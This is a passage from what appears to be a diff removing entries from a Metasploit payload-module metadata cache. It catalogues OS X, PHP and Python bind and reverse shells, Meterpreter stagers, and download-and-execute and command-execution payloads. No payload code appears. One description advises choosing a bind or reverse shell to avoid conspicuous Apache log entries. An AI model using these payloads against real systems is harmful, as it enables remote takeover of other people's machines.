11:11:01 +0000", - "path": "/modules/payloads/stagers/osx/x86/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "osx/x86/vforkshell", - "stager_refname": "osx/x86/reverse_tcp" - }, - "payload_osx/x86/vforkshell_bind_tcp": { - "name": "OS X (vfork) Command Shell, Bind TCP Inline", - "fullname": "payload/osx/x86/vforkshell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Listen for a connection, vfork if necessary, and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_osx/x86/vforkshell_reverse_tcp": { - "name": "OS X (vfork) Command Shell, Reverse TCP Inline", - "fullname": "payload/osx/x86/vforkshell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ddz " - ], - "description": "Connect back to attacker, vfork if necessary, and spawn a command shell", - "references": [], - "platform": "OSX", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "osx/x86/vforkshell_reverse_tcp", - 
"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_perl": { - "name": "PHP Command Shell, Bind TCP (via Perl)", - "fullname": "payload/php/bind_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent)", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_perl.rb", - "is_install_path": true, - "ref_name": "php/bind_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_perl_ipv6": { - "name": "PHP Command Shell, Bind TCP (via perl) IPv6", - "fullname": "payload/php/bind_perl_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl (persistent) over IPv6", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_perl_ipv6.rb", - "is_install_path": true, - "ref_name": "php/bind_perl_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_php": { - "name": "PHP Command Shell, Bind TCP (via PHP)", - "fullname": "payload/php/bind_php", - "aliases": [], - 
"rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "diaul " - ], - "description": "Listen for a connection and spawn a command shell via php", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_php.rb", - "is_install_path": true, - "ref_name": "php/bind_php", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/bind_php_ipv6": { - "name": "PHP Command Shell, Bind TCP (via php) IPv6", - "fullname": "payload/php/bind_php_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "diaul " - ], - "description": "Listen for a connection and spawn a command shell via php (IPv6)", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/bind_php_ipv6.rb", - "is_install_path": true, - "ref_name": "php/bind_php_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/download_exec": { - "name": "PHP Executable Download and Execute", - "fullname": "payload/php/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Download an EXE from an HTTP URL and execute it", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 
02:57:34 +0000", - "path": "/modules/payloads/singles/php/download_exec.rb", - "is_install_path": true, - "ref_name": "php/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/exec": { - "name": "PHP Execute Command ", - "fullname": "payload/php/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Execute a single system command", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/exec.rb", - "is_install_path": true, - "ref_name": "php/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/meterpreter/bind_tcp": { - "name": "PHP Meterpreter, Bind TCP Stager", - "fullname": "payload/php/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp" - }, - 
"payload_php/meterpreter/bind_tcp_ipv6": { - "name": "PHP Meterpreter, Bind TCP Stager IPv6", - "fullname": "payload/php/meterpreter/bind_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp_ipv6.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp_ipv6" - }, - "payload_php/meterpreter/bind_tcp_ipv6_uuid": { - "name": "PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support", - "fullname": "payload/php/meterpreter/bind_tcp_ipv6_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp_ipv6_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp_ipv6_uuid" - }, - "payload_php/meterpreter/bind_tcp_uuid": 
{ - "name": "PHP Meterpreter, Bind TCP Stager with UUID Support", - "fullname": "payload/php/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in PHP.\n\nListen for a connection with UUID Support", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/bind_tcp_uuid" - }, - "payload_php/meterpreter/reverse_tcp": { - "name": "PHP Meterpreter, PHP Reverse TCP Stager", - "fullname": "payload/php/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/reverse_tcp" - }, - "payload_php/meterpreter/reverse_tcp_uuid": { - "name": "PHP Meterpreter, PHP Reverse TCP 
Stager", - "fullname": "payload/php/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt ", - "OJ Reeves" - ], - "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/php/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "php/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "php/meterpreter", - "stager_refname": "php/reverse_tcp_uuid" - }, - "payload_php/meterpreter_reverse_tcp": { - "name": "PHP Meterpreter, Reverse TCP Inline", - "fullname": "payload/php/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Connect back to attacker and spawn a Meterpreter server (PHP)", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "php/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/reverse_perl": { - "name": "PHP Command, Double Reverse TCP Connection (via Perl)", - "fullname": "payload/php/reverse_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - 
"author": [ - "cazz " - ], - "description": "Creates an interactive shell via perl", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/reverse_perl.rb", - "is_install_path": true, - "ref_name": "php/reverse_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/reverse_php": { - "name": "PHP Command Shell, Reverse TCP (via PHP)", - "fullname": "payload/php/reverse_php", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Reverse PHP connect back shell with checks for disabled functions", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/reverse_php.rb", - "is_install_path": true, - "ref_name": "php/reverse_php", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_php/shell_findsock": { - "name": "PHP Command Shell, Find Sock", - "fullname": "payload/php/shell_findsock", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "egypt " - ], - "description": "Spawn a shell on the established connection to\n the webserver. Unfortunately, this payload\n can leave conspicuous evil-looking entries in the\n apache error logs, so it is probably a good idea\n to use a bind or reverse shell unless firewalls\n prevent them from working. 
The issue this\n payload takes advantage of (CLOEXEC flag not set\n on sockets) appears to have been patched on the\n Ubuntu version of Apache and may not work on\n other Debian-based distributions. Only tested on\n Apache but it might work on other web servers\n that leak file descriptors to child processes.", - "references": [], - "platform": "PHP", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/php/shell_findsock.rb", - "is_install_path": true, - "ref_name": "php/shell_findsock", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/exec": { - "name": "Python Execute Command", - "fullname": "payload/python/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Execute an arbitrary OS command. 
Compatible with Python 2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-04 10:43:40 +0000", - "path": "/modules/payloads/singles/python/exec.rb", - "is_install_path": true, - "ref_name": "python/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter/bind_tcp": { - "name": "Python Meterpreter, Python Bind TCP Stager", - "fullname": "payload/python/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp" - }, - "payload_python/meterpreter/bind_tcp_uuid": { - "name": "Python Meterpreter, Python Bind TCP Stager with UUID Support", - "fullname": "payload/python/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", - "references": [], - "platform": 
"Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/bind_tcp_uuid" - }, - "payload_python/meterpreter/reverse_http": { - "name": "Python Meterpreter, Python Reverse HTTP Stager", - "fullname": "payload/python/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_http.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_http" - }, - "payload_python/meterpreter/reverse_https": { - "name": "Python Meterpreter, Python Reverse HTTPS Stager", - "fullname": "payload/python/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using 
SSL", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_https.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_https" - }, - "payload_python/meterpreter/reverse_tcp": { - "name": "Python Meterpreter, Python Reverse TCP Stager", - "fullname": "payload/python/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp" - }, - "payload_python/meterpreter/reverse_tcp_ssl": { - "name": "Python Meterpreter, Python Reverse TCP SSL Stager", - "fullname": "payload/python/meterpreter/reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "Ben Campbell ", - "RageLtMan" - ], - "description": "Run a meterpreter server in Python 
(compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_ssl" - }, - "payload_python/meterpreter/reverse_tcp_uuid": { - "name": "Python Meterpreter, Python Reverse TCP Stager with UUID Support", - "fullname": "payload/python/meterpreter/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "OJ Reeves" - ], - "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/python/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "python/meterpreter/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "python/meterpreter", - "stager_refname": "python/reverse_tcp_uuid" - }, - "payload_python/meterpreter_bind_tcp": { - "name": "Python Meterpreter Shell, Bind TCP Inline", - "fullname": "payload/python/meterpreter_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": 
"payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect to the victim and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter_reverse_http": { - "name": "Python Meterpreter Shell, Reverse HTTP Inline", - "fullname": "payload/python/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter_reverse_https": { - "name": "Python Meterpreter Shell, Reverse HTTPS Inline", - "fullname": "payload/python/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - 
"autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/meterpreter_reverse_tcp": { - "name": "Python Meterpreter Shell, Reverse TCP Inline", - "fullname": "payload/python/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre" - ], - "description": "Connect back to the attacker and spawn a Meterpreter shell", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/pingback_bind_tcp": { - "name": "Python Pingback, Bind TCP (via python)", - "fullname": "payload/python/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Listens for a connection from the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/pingback_bind_tcp.rb", - "is_install_path": true, - 
"ref_name": "python/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/pingback_reverse_tcp": { - "name": "Python Pingback, Reverse TCP (via python)", - "fullname": "payload/python/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "asoto-r7" - ], - "description": "Connects back to the attacker, sends a UUID, then terminates", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_bind_tcp": { - "name": "Command Shell, Bind TCP (via python)", - "fullname": "payload/python/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mumbai" - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "python/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_sctp": { - "name": "Command Shell, Reverse SCTP (via python)", - "fullname": "payload/python/shell_reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-08 06:44:37 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_sctp.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_tcp": { - "name": "Command Shell, Reverse TCP (via python)", - "fullname": "payload/python/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ben Campbell " - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. 
Compatible with Python 2.4-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_tcp_ssl": { - "name": "Command Shell, Reverse TCP SSL (via python)", - "fullname": "payload/python/shell_reverse_tcp_ssl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.", - "references": [], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb", - "is_install_path": true, - "ref_name": "python/shell_reverse_tcp_ssl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_python/shell_reverse_udp": { - "name": "Command Shell, Reverse UDP (via python)", - "fullname": "payload/python/shell_reverse_udp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an interactive shell via Python, encodes with base64 by design. 
